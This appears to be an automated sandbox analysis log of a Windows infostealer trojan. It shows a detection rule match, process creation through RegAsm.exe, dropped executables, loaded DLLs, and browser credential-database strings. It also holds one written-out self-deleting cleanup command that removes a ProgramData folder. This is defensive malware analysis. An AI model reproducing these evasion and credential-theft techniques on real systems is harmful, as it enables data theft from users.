                Source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTRMatched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: KKJEBAAECB.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: KJKJJJECFI.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 66d0cd9a65b5d_vqwergf[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/39@4/5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C127030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,2_2_6C127030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FD2A _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_0040FD2A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F4A5 _EH_prolog,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,2_2_0040F4A5
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
                Source: C:\ProgramData\KJKJJJECFI.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1236:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2212
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                Source: BGIJJK.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                Source: file.exeReversingLabs: Detection: 34%
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\KKJEBAAECB.exe "C:\ProgramData\KKJEBAAECB.exe"
                Source: C:\ProgramData\KKJEBAAECB.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\KKJEBAAECB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\ProgramData\KKJEBAAECB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\KJKJJJECFI.exe "C:\ProgramData\KJKJJJECFI.exe"
                Source: C:\ProgramData\KJKJJJECFI.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\KJKJJJECFI.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1760
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\KKJEBAAECB.exe "C:\ProgramData\KKJEBAAECB.exe" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\KJKJJJECFI.exe "C:\ProgramData\KJKJJJECFI.exe" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exitJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeSection loaded: version.dllJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeSection loaded: version.dllJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
